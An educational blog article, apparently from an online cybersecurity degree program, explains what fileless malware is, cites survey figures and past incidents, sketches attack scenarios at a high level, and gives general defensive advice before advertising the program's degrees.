The most basic fact of fileless malware is that unlike other malware, it does not have a footprint. It uses built-in tools from the operating system to make the attack a part of the normal functioning of the system. Without using traditional executable files as a source of entry into the system, fileless malware often hides in the memory or places where it is difficult to detect. From its hiding point, it directly targets RAM or joins other attack vectors like ransomware or spyware to accomplish its attack. As it writes on RAM and not to the disk, it leaves no traces of its existence and thus cannot be detected by antivirus software.
Cybersecurity is on high alert due to rising invisible malware attacks
Carbon Black had shocking figures on fileless malware attacks when they interviewed security researchers [1]. The glimpses from the interview are –
- 93% consider fileless malware attacks more threatening than other cyber attacks.
- 64% confirmed that they are experiencing an increasing number of fileless attacks.
- 62% of fileless malware attacks are induced to compromise customer data.
Most common types of malware attacks were:
Remote logins | WMI-based attacks | In-memory attacks | PowerShell-based attacks | Microsoft office macro attacks |
54% | 41% | 39% | 34% | 31% |
Corporate IP | Credential | Financial data |
53% | 42% | 41% |
Fileless malware attacks are not new. The techniques used in these attacks are as old as the early 2000s. SQL Slammer worm that was identified in 2003 affected thousands of computers in a network in less than a minute was a fileless malware attack. [3] From then, the number of attacks has only increased, as has the damage caused.
A report from SentinelOne shows a rise in fileless malware attacks over ransomware attacks in the first half of 2018. [4]
Further, fileless malware is contributing to 42 attacks out of 1000 endpoint attacks. It may not take much time for this malware to grow beyond enterprise networks to impact everyone.
Another example of a fileless malware attack would be where an attacker stole $8 million cash overnight from ATMs in Russia using a “disappearing malware.” The malware was so named because there were no signs of any malicious files on the machines or bank networks. CCTV footage showed that the hacker was able to withdraw money from the ATM machines without even touching them! [5] |
Fileless malware is only becoming more sophisticated as attackers are now placing a script in the registry. This script reinstates the malicious code even though the machine is powered down and restarted. Malware manufacturers are also developing techniques that can utilize data encryption and ransomware. [6] If successful, these attacks can be devastating.
How does a fileless malware attack happen?
Potential attack scenarios of fileless malware:
- Malicious code is injected in already installed legitimate applications like a web browser or Microsoft Word, and then the malicious code is executed.
- A file that appears to be legitimate loads a link into memory and a script remotely execute the attack. This is usually done to trace confidential data.
- Highly targeted tools like Microsoft PowerShell and Microsoft Windows Management Instrumentation (WMI) scripting languages are targeted to get the script run remotely.
- Phishing emails, malvertising, and malicious downloads are common forms of spreading fileless malware.
- It can be hosted on a website, from where it is permitted to run in the browser’s memory and spread to cause havoc on your system.
On the whole, there is no malicious program or content that you can find installed separately on your hard drive, and this is what makes fileless malware a tricky attack to handle. Once the malware is in your system, it can abuse legitimate administration tools and software to gain privileges and multiply. Another important observation here is that the attacker doesn’t have to worry about sneaking a malicious program past the antivirus and security software. This is because the line alterations cannot be detected by automated sensors.
Equifax breach is an example of a fileless attack as it used a command injection vulnerability in Apache Struts. Satya Gupta, Founder, and CTO at Virsec Systems, Inc, said that “In this type of attack, a vulnerable application does not adequately validate users’ input, which may contain operating system commands. As a result, these commands can get executed on the victim machine with the same privileges as those of the vulnerable application.” [2] |
Protection from fileless malware attacks
As the cybersecurity industry is becoming more responsive to exploits, the lifespan of fileless attacks is reducing. The simplest way to defend your system from fileless malware is to keep your software up to date. This includes all the basic software applications like Microsoft 365 Suite, which comes with an upgraded package on Windows Defender that can detect irregular activities.
Another way is to counteract fileless attacks to address the entire threat lifecycle. The multi-layer defense strategy is again a good practice as it enables you to investigate every phase of a campaign before, during, and after an attack.
Two important key techniques –
- Ability to observe and measure: You should be able to discover the key techniques used during the attack, access aggregated threat data, monitor PowerShell or scripting engines, and track user activities.
- Ability to control the victim system: You should be able to shut down the running processes and isolate the infected system from the network.
A successful fileless attack is hard to identify until it destroys the target. The future of fileless attacks may be worse as attackers take steps to go beyond evasion and register to solidify existence after the system reboots.
With this article, we have come to the end of the series on malware attacks. We are sure that the entire collection of the writeups would have inspired you to become a cyber enthusiast. If you are planning to make your career in cybersecurity, then you should join our online Bachelor of Science in Cybersecurity (BSCS) program or the Master of Science in Cybersecurity (MSCS). Both programs are completely online, instructor-paced, and two-years duration.
Source:
[1] https://www.carbonblack.com/resources/definitions/what-is-fileless-malware/ [2] https://www.csoonline.com/article/3227046/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html [3] http://news.bbc.co.uk/2/hi/technology/2693925.stm [4] https://threatpost.com/threatlist-ransomware-attacks-down-fileless-malware-up-in-2018/136962/ [5] https://www.vice.com/en_us/article/538ebn/atm-hack-russia-disappearing-malware [6] https://www.malwarefox.com/fileless-malware/